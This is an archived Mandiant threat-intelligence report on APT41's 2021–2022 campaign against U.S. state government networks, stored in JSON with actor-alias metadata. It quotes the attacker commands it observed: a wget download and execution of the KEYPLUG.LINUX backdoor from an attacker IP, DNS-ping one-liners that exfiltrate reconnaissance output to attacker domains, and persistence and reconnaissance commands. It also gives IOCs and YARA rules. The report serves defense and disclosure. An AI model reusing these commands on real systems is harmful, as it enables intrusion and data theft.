{ "id": "f5990ce0-be4a-44ef-a252-c6edff659f51", "created_at": "2026-04-06T00:11:35.789525Z", "updated_at": "2026-04-10T03:36:13.842634Z", "deleted_at": null, "sha1_hash": "dbb55bc5b016da66d2021a78743f7284add9c492", "title": "APT41 Targeting U.S. State Government Networks | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 871883, "plain_text": "APT41 Targeting U.S. State Government Networks | Mandiant\r\nBy Mandiant\r\nPublished: 2022-03-08 · Archived: 2026-04-05 15:44:54 UTC\r\nWritten by: Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram\r\nUPDATE (Mar. 8): The original post may not have provided full clarity that CVE-2021-44207 (USAHerds) had a patch\r\ndeveloped by Acclaim Systems for applicable deployments on or around Nov. 15, 2021. Mandiant cannot speak to the\r\naffected builds, deployment, adoption, or other technical factors of this vulnerability patch beyond its availability.\r\nIn May 2021 Mandiant responded to an APT41 intrusion targeting a United States state government computer network. This\r\nwas just the beginning of Mandiant’s insight into a persistent months-long campaign conducted by APT41 using vulnerable\r\nInternet facing web applications as their initial foothold into networks of interest. APT41 is a prolific Chinese state-sponsored espionage group known to target organizations in both the public and private sectors and also conducts financially\r\nmotivated activity for personal gain.\r\nIn this blog post, we detail APT41’s persistent effort that allowed them to successfully compromise at least six U.S. state\r\ngovernment networks by exploiting vulnerable Internet facing web applications, including using a zero-day vulnerability in\r\nthe USAHerds application (CVE-2021-44207) as well as the now infamous zero-day in Log4j (CVE-2021-44228). While\r\nthe overall goals of APT41's campaign remain unknown, our investigations into each of these intrusions has revealed a\r\nvariety of new techniques, malware variants, evasion methods, and capabilities.\r\nCampaign Overview\r\nAlthough APT41 has historically performed mass scanning and exploitation of vulnerabilities, our investigations into APT41\r\nactivity between May 2021 and February 2022 uncovered evidence of a deliberate campaign targeting U.S. state\r\ngovernments. During this timeframe, APT41 successfully compromised at least six U.S. state government networks through\r\nthe exploitation of vulnerable Internet facing web applications, often written in ASP.NET. In most of the web application\r\ncompromises, APT41 conducted .NET deserialization attacks; however, we have also observed APT41 exploiting SQL\r\ninjection and directory traversal vulnerabilities.\r\nIn the instance where APT41 gained access through a SQL injection vulnerability in a proprietary web application, Mandiant\r\nManaged Defense quickly detected and contained the activity; however, two weeks later APT41 re-compromised the\r\nnetwork by exploiting a previously unknown zero-day vulnerability in a commercial-off-the-shelf (CoTS) application,\r\nUSAHerds. In two other instances, Mandiant began an investigation at one state agency only to find that APT41 had also\r\ncompromised a separate, unrelated agency in the same state.\r\nAPT41 was also quick to adapt and use publicly disclosed vulnerabilities to gain initial access into target networks, while\r\nalso maintaining existing operations. On December 10th, 2021, the Apache Foundation released an advisory for a critical\r\nremote code execution (RCE) vulnerability in the commonly used logging framework Log4J. Within hours of the advisory,\r\nAPT41 began exploiting the vulnerability to later compromise at least two U.S. state governments as well as their more\r\ntraditional targets in the insurance and telecommunications industries.\r\nIn late February 2022, APT41 re-compromised two previous U.S. state government victims. Our ongoing investigations\r\nshow the activity closely aligns with APT41's May-December 2021 activity, representing a continuation of their campaign\r\ninto 2022 and demonstrating their unceasing desire to access state government networks. A timeline of representative\r\nintrusions from this campaign can be seen in Figure 1.\r\nFigure 1: U.S. state government campaign timeline\r\nThe goals of this campaign are currently unknown, though Mandiant has observed evidence of APT41 exfiltrating Personal\r\nIdentifiable Information (PII). Although the victimology and targeting of PII data is consistent with an espionage operation,\r\nhttps://www.mandiant.com/resources/blog/apt41-us-state-governments\r\nPage 1 of 9\n\nMandiant cannot make a definitive assessment at this time given APT41’s history of moonlighting for personal financial\ngain.\nExploitation of Deserialization Vulnerabilities\nAPT41 has primarily used malicious ViewStates to trigger code execution against targeted web applications. Within the\nASP.NET framework, ViewState is a method for storing the application’s page and control values in HTTP requests to and\nfrom the server. The ViewState is sent to the server with each HTTP request as a Base64 encoded string in a hidden form\nfield. The web server decodes the string and applies additional transformations to the string so that it can be unpacked into\ndata structures the server can use. This process is known as deserialization.\nInsecure deserialization of user-supplied input can result in code execution. ASP.NET has several insecure deserialization\nproviders, including the one used for ViewStates: ObjectStateFormatter. To prevent a threat actor from manipulating the\nViewState and taking advantage of the insecure deserialization provider, the ViewState is protected by a Message\nAuthentication Code (MAC). This MAC is a cryptographically signed hash value that the server uses to ensure that the\nViewState has not been tampered with, possibly to trigger code execution. The integrity of the ViewState depends on the\napplication’s machineKey remaining confidential. The machineKey is stored on the application server in a configuration file\nnamed web.config.\nFigure 2 Sample machineKey attribute from a web.config file\nA threat actor with knowledge of the machineKey can construct a malicious ViewState and then generate a new and valid\nMAC that the server accepts. With a valid MAC, the server will then deserialize the malicious ViewState, resulting in the\nexecution of code on the server. Publicly available tools such as YSoSerial.NET exist to construct these malicious\nViewStates. This is precisely how APT41 initiated their campaign in May 2021.\nProprietary Web Application Targeting\nIn June 2020, one year before APT41 began this campaign, Mandiant investigated an incident where APT41 exploited a\ndirectory traversal vulnerability specifically to read the web.config file for a vulnerable web application on a victim web\nserver. APT41 then used the machineKey values from the web.config file to generate a malicious ViewState payload for a\ndeserialization exploit. Mandiant did not identify how APT41 originally obtained the machineKey values for the proprietary\napplication exploited in May 2021 or the USAHerds application, which was first exploited in July 2021. However, it is\nlikely that APT41 obtained the web.config file through similar means.\nTo craft malicious ViewStates, APT41 relied on the publicly available Github project YSoSerial.NET. In order to\nsuccessfully load arbitrary .NET assemblies into memory, APT41 set the DisableActivitySurrogateSelectorTypeCheck\nproperty flag to true within the ConfigurationManager.AppSettings class of the running application via the ViewState\npayload. APT41 subsequently loaded .NET assemblies into memory using additional YSoSerial payloads configured to write\nwebshells to a hardcoded filepath on disk.\nFigure 3: Deserialized .NET Assembly (dnSpy)\nFigure 4 shows an example JScript webshell deployed through a malicious ViewState object by APT41 which utilizes Code\nPage 936 for the Chinese Simplified keyboard language.\nhttps://www.mandiant.com/resources/blog/apt41-us-state-governments\nPage 2 of 9\n\nFigure 4: Deserialized JScript Webshell\r\nFor additional information regarding deserialization exploits and our new hunting rule generation tool ‘HeySerial’, read our\r\nblog post, Now You Serial, Now You Don’t — Systematically Hunting for Deserialization Exploits.\r\nUSAHerds (CVE-2021-44207) Zero-Day\r\nIn three investigations from 2021, APT41 exploited a zero-day vulnerability in the USAHerds web application. USAHerds is\r\na CoTS application written in ASP.NET and used by 18 states for animal health management. The vulnerability in\r\nUSAHerds (CVE-2021-44207) is similar to a previously reported vulnerability in Microsoft Exchange Server (CVE-2020-\r\n0688), where the applications used a static validationKey and decryptionKey (collectively known as the machineKey) by\r\ndefault. As a result, all installations of USAHerds shared these values, which is against the best practice of using uniquely\r\ngenerated machineKey values per application instance.\r\nGenerating unique machineKey values is critical to the security of an ASP.NET web application because the values are used\r\nto secure the integrity of the ViewState.\r\nMandiant did not identify how APT41 originally obtained the machineKey values for USAHerds; however, once APT41\r\nobtained the machineKey, they were able to compromise any server on the Internet running USAHerds. As a result, there are\r\npotentially additional unknown victims.\r\nLog4j (CVE-2021-44228)\r\nThe most recent APT41 campaign began shortly after the release of CVE-2021-44228 and its related proof-of-concept\r\nexploits in December 2021. Exploiting this vulnerability, also known as Log4Shell, causes Java to fetch and deserialize a\r\nremote Java object, resulting in potential code execution. Similar to their previous web application targeting, APT41\r\ncontinued to use YSoSerial generated deserialization payloads to perform reconnaissance and deploy backdoors. Notably,\r\nAPT41 deployed a new variant of the KEYPLUG backdoor on Linux servers at multiple victims, a malware sub-family we\r\nnow track as KEYPLUG.LINUX. KEYPLUG is a modular backdoor written in C++ that supports multiple network\r\nprotocols for command and control (C2) traffic including HTTP, TCP, KCP over UDP, and WSS. APT41 heavily used the\r\nWindows version of the KEYPLUG backdoor at state government victims between June 2021 and December 2021, thus the\r\ndeployment of a ported version of the backdoor closely following the state government campaign was significant.\r\nAfter exploiting Log4Shell, APT41 continued to use deserialization payloads to issue ping commands to domains, a\r\ntechnique APT41 frequently used at government victims months prior. An example ping command is shown in Figure 5.\r\nping -c 1 libxqagv[.]ns[.]dns3[.]cf\r\nFigure 5: Ping Command to Attacker Controlled Infrastructure\r\nUpon gaining access to a target environment, APT41 performed host and network reconnaissance before deploying\r\nKEYPLUG.LINUX to establish a foothold in the environment. Sample commands used to deploy KEYPLUG.LINUX can\r\nbe seen in Figure 6.\r\nwget http://103.224.80[.]44:8080/kernel\r\nchmod 777 kernel\r\nmv kernel .kernel\r\nnohup ./.kernel \u0026\r\nFigure 6: Deployment of KEYPLUG.LINUX Following Log4j Exploitation\r\n“All Killer No Filler” Intrusion TTPs\r\nThe updated tradecraft and new malware continue to show APT41 is a highly adaptable and resourceful actor. In this\r\nsection, we detail the most pertinent post-compromise techniques.\r\nReconnaissance\r\nAfter gaining initial access to an internet-facing server, APT41 performed extensive reconnaissance and credential\r\nharvesting. A common tactic seen is the deployment of a ConfuserEx obfuscated BADPOTATO binary to abuse named pipe\r\nhttps://www.mandiant.com/resources/blog/apt41-us-state-governments\r\nPage 3 of 9\n\nimpersonation for local NT AUTHORITY\\SYSTEM privilege escalation. Once APT41 escalated to NT\r\nAUTHORITY\\SYSTEM privileges, they copied the local SAM and SYSTEM registry hives to a staging directory for\r\ncredential harvesting and exfiltration. APT41 has additionally used Mimikatz to execute the lsadump::sam command on the\r\ndumped registry hives to obtain locally stored credentials and NTLM hashes.\r\nAPT41 also conducted Active Directory reconnaissance by uploading the Windows command-line tool dsquery.exe (MD5:\r\n49f1daea8a115dd6fce51a1328d863cf) and its associated module dsquery.dll (MD5: b108b28138b93ec4822e165b82e41c7a)\r\nto a staging directory on the compromised server. Figure 7 shows multiple dsquery commands used to enumerate various\r\nActive Directory objects within the environment.\r\nc:\\programdata\\dsquery.exe * -filter \"(objectCategory=Person)\" -attr cn title displayName description department company\r\nc:\\programdata\\dsquery.exe * -filter \"(objectCategory=Computer)\" -attr cn operatingSystem operatingSystemServicePack opera\r\nc:\\programdata\\dsquery.exe * -filter \"(objectCategory=Computer)\" -attr cn servicePrincipalName -L -limit 0\r\nc:\\programdata\\dsquery.exe * -filter \"(objectCategory=Group)\" -uc -attr cn sAMAccountName distinguishedName description -l\r\nc:\\programdata\\dsquery.exe * -filter \"(objectClass=organizationalUnit)\" -attr ou name whenCreated distinguishedName gPLink\r\nFigure 7: dsquery Active Directory Reconnaissance Commands\r\nDuring the early stage of one U.S. state government intrusion, Mandiant identified a new malware family used by APT41 we\r\ntrack as DUSTPAN. DUSTPAN is an in-memory dropper written in C++ that leverages ChaCha20 to decrypt embedded\r\npayloads. Different variations of DUSTPAN may also load and execute a payload from a hard-coded filepath encrypted in\r\nthe binary. DUSTPAN is consistent with the publicly named StealthVector, reported by Trend Micro in August 2021. During\r\nthe intrusion, DUSTPAN was used to drop a Cobalt Strike BEACON backdoor.\r\nAnti-Analysis\r\nAPT41 continues to leverage advanced malware in their existing toolkit, such as the DEADEYE launcher and LOWKEY\r\nbackdoor, with added capabilities and anti-analysis techniques to hinder investigations. During a recent intrusion Mandiant\r\nidentified a new malware variant, DEADEYE.EMBED, contained in an Alternate Data Stream of a local file.\r\nDEADEYE.EMBED variants embed the payload inside of the compiled binary rather than appended to the overlay at the\r\nend of the file, as seen in DEADEYE.APPEND.\r\nAPT41 commonly packages their malware with VMProtect to slow reverse engineering efforts. During multiple U.S. state\r\ngovernment intrusions, APT41 incorporated another anti-analysis technique by chunking a VMProtect packaged DEADEYE\r\nbinary into multiple sections on disk. Breaking the binary into multiple files reduces the chance that all samples can be\r\nsuccessfully acquired during a forensic investigation. Common file naming conventions used by APT41 when deploying\r\nDEADEYE on victim hosts can be seen in Figure 8.\r\nFigure 8: DEADEYE Filenames\r\nThese files would then be combined into a single DLL before execution as seen in Figure 9.\r\n\"cmd\" /c copy /y /b C:\\Users\\public\\syslog_6-*.dat C:\\Users\\public\\syslog.dll\r\nFigure 9: DEADEYE Command to concatenate DEADEYE sections\r\nIn addition to separating their VMProtect packaged malware on disk, APT41 changed the standard VMProtect section names\r\n(.vmp) to UPX section names (.upx). By doing so, the malware could evade basic hunting detections that flag binaries\r\npackaged with VMProtect. During Log4j exploitation, APT41 similarly chunked a KEYPLUG.LINUX binary into four\r\nseparate files named “xaa”, ” xab”, ” xac”, and ”xad”. APT41 also packaged the KEYPLUG.LINUX binary with VMProtect\r\nand used UPX section names. This technique is very low in prevalence across our malware repository, and even lower in\r\nprevalence when searching across ELF files.\r\nAPT41 also updated the DEADEYE execution guardrail capabilities used during the campaign. Guardrailing is a technique\r\nused by malware to ensure that the binary only executes on systems that the threat actor intended. DEADEYE samples from\r\nolder campaigns used the victim computer’s volume serial number but they have since been updated to use the hostname\r\nand/or DNS domain during the U.S. state government campaign. To acquire the local computer’s hostname and DNS\r\nhttps://www.mandiant.com/resources/blog/apt41-us-state-governments\r\nPage 4 of 9\n\ndomain, DEADEYE executes the WinAPI functions GetComputerNameA and/or GetComputerNameExA and provides it as\r\ninput for a generated decryption key.\r\nPersistence\r\nAPT41 continues to leverage advanced tradecraft to remain persistent and undetected. In multiple instances, the Windows\r\nversion of the KEYPLUG backdoor leveraged dead drop resolvers on two separate tech community forums. The malware\r\nfetches its true C2 address from encoded data on a specific forum post. Notably, APT41 continues to update the community\r\nforum posts frequently with new dead drop resolvers during the campaign. APT41 has historically used this unique\r\ntradecraft during other intrusions to help keep their C2 infrastructure hidden.\r\nTo persist execution of DEADEYE, APT41 has leveraged the schtasks /change command to modify existing scheduled tasks\r\nthat run under the context of SYSTEM. APT41 commonly uses the living off the land binary (lolbin)\r\nshell32.dll!ShellExec_RunDLLA in scheduled tasks for binary execution, such as the example shown in Figure 10.\r\nSCHTASKS /Change /tn \"\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor\" /TR \"C:\\windows\\system32\\rundll32.exe\r\nFigure 10: Modified Scheduled Task\r\nAPT41 has leveraged the following Windows scheduled tasks for persistence of DEADEYE droppers in U.S. state\r\ngovernment intrusions:\r\n\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor\r\n\\Microsoft\\Windows\\Ras\\ManagerMobility\r\n\\Microsoft\\Windows\\WDI\\SrvSetupResults\r\n\\Microsoft\\Windows\\WDI\\USOShared\r\nAnother technique APT41 used to launch malware is through the addition of a malicious import to the Import Address Table\r\n(IAT) of legitimate Windows PE binaries. As a result, once the legitimate binary is executed, it will load the malicious\r\nlibrary and call its DllEntryPoint. A modified IAT of a legitimate Microsoft HealthService.exe binary can be seen in Figure\r\n11.\r\nFigure 11: Modified IAT (CFF Explorer)\r\nAPT41 continues to tailor their malware to victim environments through their stealthy passive backdoor\r\nLOWKEY.PASSIVE. During one intrusion, APT41 exploited a USAHerds server and subsequently executed\r\nDEADEYE.APPEND which dropped LOWKEY.PASSIVE in-memory. The identified LOWKEY.PASSIVE sample listened\r\nfor incoming connections that request either of the following URL endpoints:\r\nhttp://\u003cHOST:PORT\u003e/USAHerds/Common/%s.css\r\nhttps://\u003cHOST:PORT\u003e/USAHerds/Common/%s.css\r\nAPT41 frequently configured LOWKEY.PASSIVE URL endpoints to masquerade as normal web application traffic on an\r\ninfected server.\r\n“It’s Always Cloudy in Chengdu” — Cloudflare Usage\r\nAPT41 has substantially increased their usage of Cloudflare services for C2 communications and data exfiltration.\r\nSpecifically, APT41 leveraged Cloudflare Workers to deploy serverless code accessible through the Cloudflare CDN which\r\nhttps://www.mandiant.com/resources/blog/apt41-us-state-governments\r\nPage 5 of 9\n\nhelps proxy C2 traffic to APT41 operated infrastructure.\r\nAt multiple victims, APT41 issued ping commands where the output of a reconnaissance command was prepended to\r\nsubdomains of Cloudflare proxied infrastructure. Once the ping command was executed, the local DNS resolver attempted\r\nto resolve the fabricated domain containing the prepended command output. The forward DNS lookup eventually reached\r\nthe primary domain's Cloudflare name servers, which were unable to resolve an IP address for the fabricated domain.\r\nHowever, the DNS activity logs of the attacker-controlled domain recorded the DNS lookup of the subdomain, allowing the\r\ngroup to collect the reconnaissance command output.\r\nExamples of this technique can be seen in Figure 12 to Figure 15.\r\n$a=whoami;ping ([System.BitConverter]::ToString([System.Text.Encoding]::UTF8.GetBytes($a)).replace('-','')+\"\"[.]ns[.]time\r\nFigure 12: Reconnaissance Exfiltration\r\ncmd.exe /c ping %userdomain%[.]ns[.]time12[.]cf\r\nFigure 13: Reconnaissance Exfiltration\r\nIn Figure 14, APT41 issued a command to find the volume serial number of the system, which has historically been used as\r\nthe decryption key for DEADEYE payloads.\r\nping -n 1 ((cmd /c dir c:\\|findstr Number).split()[-1]+'.ns[.]time12[.]cf\r\nFigure 14: Volume Serial Number Exfiltration\r\nIn this last example, the command prints the length of the file syslog_6-1.dat, likely to ensure it has been fully written to\r\ndisk prior to combining the multiple files into the full malicious executable.\r\nping -n 1 ((ls C:\\Users\\public\\syslog_6-1.dat).Length.ToString()+\"\".ns[.]time12[.]cf\"\")\r\nFigure 15: File Size Exfiltration\r\nAPT41 leveraged the aforementioned technique for further data exfiltration by hex encoding PII data and prepending the\r\nresults as subdomains of the attacker-controlled domain. The resulting DNS lookups triggered by the ping commands would\r\nbe recorded in the activity logs and available to APT41.\r\nAPT41’s continued usage of Cloudflare services is further exemplified in recently developed KEYPLUG samples. Mandiant\r\nidentified a unique capability added to KEYPLUG that leverages the WebSocket over TLS (WSS) protocol for C2\r\ncommunication. According to Cloudflare, WebSocket traffic can be established through the Cloudflare CDN edge servers,\r\nwhich will proxy data through to the specified origin server.\r\nKEYPLUG includes a hardcoded one-byte XOR encoded configuration file that lists the specific communication protocol,\r\nservers, and additional settings. After KEYPLUG decodes the hardcoded configuration file at runtime, it will parse the\r\nconfiguration to determine the appropriate network protocol and servers to use for command and control. After the\r\nconfiguration is parsed, KEYPLUG randomly chooses a CIDR block from the list then randomly chooses an IP address\r\nwithin the CIDR block based on the current tick count of the infected computer.\r\nFigure 16 details an example configuration file identified during a recent U.S. state government intrusion.\r\nWSS://104.24.0.0/14;103.22.200.0/22;103.21.244.0/22:443|7600|5|1|afdentry.workstation.eu.org:443\r\nFigure 16: KEYPLUG Configuration\r\nThe CIDR blocks listed in Figure 16 are Cloudflare CDN associated infrastructure that will redirect the WSS connection to\r\nthe malicious domain afdentry[.]workstation[.]eu[.]org.\r\nFigure 17 is an example HTTP request sent by KEYPLUG to initiate and upgrade to the WSS protocol using Cloudflare\r\ninfrastructure.\r\nhttps://www.mandiant.com/resources/blog/apt41-us-state-governments\r\nPage 6 of 9\n\nFigure 17: KEYPLUG HTTP Upgrade Request\r\nWe notified Cloudflare of this malicious activity and they took prompt action to disrupt communications to the malicious\r\ninfrastructure. APT41’s increased usage of Cloudflare services indicates a desire to leverage Cloudflare’s flexibility and\r\ndeter identification and blocking of their true C2 servers.\r\nOutlook\r\nAPT41's recent activity against U.S. state governments consists of significant new capabilities, from new attack vectors to\r\npost-compromise tools and techniques. APT41 can quickly adapt their initial access techniques by re-compromising an\r\nenvironment through a different vector, or by rapidly operationalizing a fresh vulnerability. The group also demonstrates a\r\nwillingness to retool and deploy capabilities through new attack vectors as opposed to holding onto them for future use.\r\nAPT41 exploiting Log4J in close proximity to the USAHerds campaign showed the group’s flexibility to continue targeting\r\nU.S state governments through both cultivated and co-opted attack vectors. Through all the new, some things remain\r\nunchanged: APT41 continues to be undeterred by the U.S. Department of Justice (DOJ) indictment in September 2020.\r\nIndicators\r\nMalware Family MD5 SHA1 SHA256\r\nKEYPLUG.LINUX 900ca3ee85dfc109baeed4888ccb5d39 355b3ff61db44d18003537be8496eb03536e300f e024ccc4c72eb5813cc2b6db7975\r\nKEYPLUG.LINUX b82456963d04f44e83442b6393face47 996aa691bbc1250b571a2f5423a5d5e2da8317e6 d7e8cc6c19ceebf0e125c9f18b50\r\nDSQUERY 49f1daea8a115dd6fce51a1328d863cf e85427af661fe5e853c8c9398dc46ddde50e2241 ebf28e56ae5873102b51da2cc49c\r\nDSQUERY b108b28138b93ec4822e165b82e41c7a 7056b044f97e3e349e3e0183311bb44b0bc3464f 062a7399100454c7a523a938293\r\nBADPOTATO 143278845a3f5276a1dd5860e7488313 6f6b51e6c88e5252a2a117ca1cfb57934930166b a4647fcb35c79f26354c34452e4a\r\nContext Indicator(s)\r\nU.S. State  Government Campaign – USAHerds (CVE-2021-44207) Exploitation 194[.]195[.]125[.]121\r\n194[.]156[.]98[.]12 \r\n54[.]248[.]110[.]45\r\n45[.]153[.]231[.]31\r\n185[.]118[.]167[.]40\r\n104[.]18[.]6[.]251\r\n104[.]18[.]7[.]251\r\n20[.]121[.]42[.]11\r\n34[.]139[.]13[.]46\r\n54[.]80[.]67[.]241\r\n149[.]28[.]15[.]152\r\n18[.]118[.]56[.]237\r\n107[.]172[.]210[.]69\r\n172[.]104[.]206[.]48\r\n67[.]205[.]132[.]162\r\n45[.]84[.]1[.]181\r\nhttps://www.mandiant.com/resources/blog/apt41-us-state-governments\r\nPage 7 of 9\n\ncdn[.]ns[.]time12[.]cf\r\neast[.]winsproxy[.]com\r\nafdentry[.]workstation[.]eu[.]org\r\nns1[.]entrydns[.]eu[.]org\r\nsubnet[.]milli-seconds[.]com\r\nwork[.]viewdns[.]ml\r\nwork[.]queryip[.]cf\r\nLog4j (CVE-2021-44228) Exploitation\r\n103[.]238[.]225[.]37\r\n182[.]239[.]92[.]31\r\nmicrosoftfile[.]com\r\ndown-flash[.]com\r\nlibxqagv[.]ns[.]dns3[.]cf\r\nrule M_APT_Backdoor_KEYPLUG_MultiXOR_Config\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Matches KEYPLUG XOR-encoded configurations. Locates multiple values of: TCP://, UDP://, WSS://, +ht\r\n strings:\r\n // TCP\r\n $tcp1 = \"TCP://\" xor(0x01-0x2E)\r\n $tcp2 = \"TCP://\" xor(0x30-0xFF)\r\n $ptcp1 = \"|TCP://\" xor(0x01-0x2E)\r\n $ptcp2 = \"|TCP://\" xor(0x30-0xFF)\r\n // UDP\r\n $udp1 = \"UDP://\" xor(0x01-0x2E)\r\n $udp2 = \"UDP://\" xor(0x30-0xFF)\r\n $pudp1 = \"|UDP://\" xor(0x01-0x2E)\r\n $pudp2 = \"|UDP://\" xor(0x30-0xFF)\r\n // WSS\r\n $wss1 = \"WSS://\" xor(0x01-0x2E)\r\n $wss2 = \"WSS://\" xor(0x30-0x52)\r\n $wss3 = \"WSS://\" xor(0x54-0xFF)\r\n $pwss1 = \"|WSS://\" xor(0x01-0x2E)\r\n $pwss2 = \"|WSS://\" xor(0x30-0x52)\r\n $pwss3 = \"|WSS://\" xor(0x54-0xFF)\r\n // HTTP\r\n $http1 = \"+http\" xor(0x01-0x73)\r\n $http2 = \"+http\" xor(0x75-0xFF)\r\n $phttp1 = \"|+http\" xor(0x01-0x73)\r\n $phttp2 = \"|+http\" xor(0x75-0xFF)\r\n // Sleep value\r\n $zeros1 = \"00|\" xor(0x01-0x2F)\r\n $zeros2 = \"00|\" xor(0x31-0xFF)\r\n condition:\r\n filesize \u003c 10MB and\r\n (uint32(0) == 0x464c457f or (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550)) and\r\n for any of ($tcp*,$udp*,$wss*,$http*): (# == 2 and @[2] - @[1] \u003c 200) and\r\n for any of ($ptcp*,$pudp*,$pwss*,$phttp*): (# == 1) and\r\n any of ($zeros*)\r\n}\r\nrule M_Hunting_MSIL_BADPOTATO\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting for BADPOTATO samples based on default strings found on the PE VERSIONINFO resource.\"\r\n strings:\r\nhttps://www.mandiant.com/resources/blog/apt41-us-state-governments\r\nPage 8 of 9\n\n$dotnetdll = \"\\x00_CorDllMain\\x00\"\r\n $dotnetexe = \"\\x00_CorExeMain\\x00\"\r\n $s1 = { 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 42 0\r\n $s2 = { 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 42 00 61 00 64 00 50 00 6F 0\r\n $s3 = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 42 0\r\n $s4 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 42 00 61 00 64 00 50 00 6F 0\r\n condition:\r\n (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and 1 of ($dotnet*) and 1 of ($s*)\r\n}\r\nAcknowledgements\r\nWe would like to thank our incident response consultants, Managed Defense responders, and FLARE reverse engineers who\r\nenable this research. In addition, we would like to thank Alyssa Rahman, Dan Perez, Ervin Ocampo, Blaine Stancill, and\r\nNick Richard for their technical reviews.\r\nPosted in\r\nThreat Intelligence\r\nSource: https://www.mandiant.com/resources/blog/apt41-us-state-governments\r\nhttps://www.mandiant.com/resources/blog/apt41-us-state-governments\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.mandiant.com/resources/blog/apt41-us-state-governments" ], "report_names": [ "apt41-us-state-governments" ], "threat_actors": [ { "id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf", "created_at": "2023-01-06T13:46:38.626906Z", "updated_at": "2026-04-10T02:00:03.043681Z", "deleted_at": null, "main_name": "Tick", "aliases": [ "G0060", "Stalker Taurus", "PLA Unit 61419", "Swirl Typhoon", "Nian", "BRONZE BUTLER", "REDBALDKNIGHT", "STALKER PANDA" ], "source_name": "MISPGALAXY:Tick", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "54e55585-1025-49d2-9de8-90fc7a631f45", "created_at": "2025-08-07T02:03:24.563488Z", "updated_at": "2026-04-10T02:00:03.715427Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "CTG-2006 ", "Daserf", "Stalker Panda ", "Swirl Typhoon ", "Tick " ], "source_name": "Secureworks:BRONZE BUTLER", "tools": [ "ABK", "BBK", "Casper", "DGet", "Daserf", "Datper", "Ghostdown", "Gofarer", "MSGet", "Mimikatz", "Netboy", "RarStar", "Screen Capture Tool", "ShadowPad", "ShadowPy", "T-SMB", "down_new", "gsecdump" ], "source_id": "Secureworks", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b", "created_at": "2022-10-25T16:07:23.419513Z", "updated_at": "2026-04-10T02:00:04.591062Z", "deleted_at": null, "main_name": "Bronze Butler", "aliases": [ "Bronze Butler", "CTG-2006", "G0060", "Operation ENDTRADE", "RedBaldNight", "Stalker Panda", "Stalker Taurus", "Swirl Typhoon", "TEMP.Tick", "Tick" ], "source_name": "ETDA:Bronze Butler", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "9002 RAT", "AngryRebel", "Blogspot", "Daserf", "Datper", "Elirks", "Farfli", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "HomamDownloader", "Homux", "Hydraq", "Lilith", "Lilith RAT", "McRAT", "MdmBot", "Mimikatz", "Minzen", "Moudour", "Muirim", "Mydoor", "Nioupale", "PCRat", "POISONPLUG.SHADOW", "Roarur", "RoyalRoad", "ShadowPad Winnti", "ShadowWali", "ShadowWalker", "SymonLoader", "WCE", "Wali", "Windows Credential Editor", "Windows Credentials Editor", "XShellGhost", "XXMM", "gsecdump", "rarstar" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434295, "ts_updated_at": 1775792173, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/dbb55bc5b016da66d2021a78743f7284add9c492.pdf", 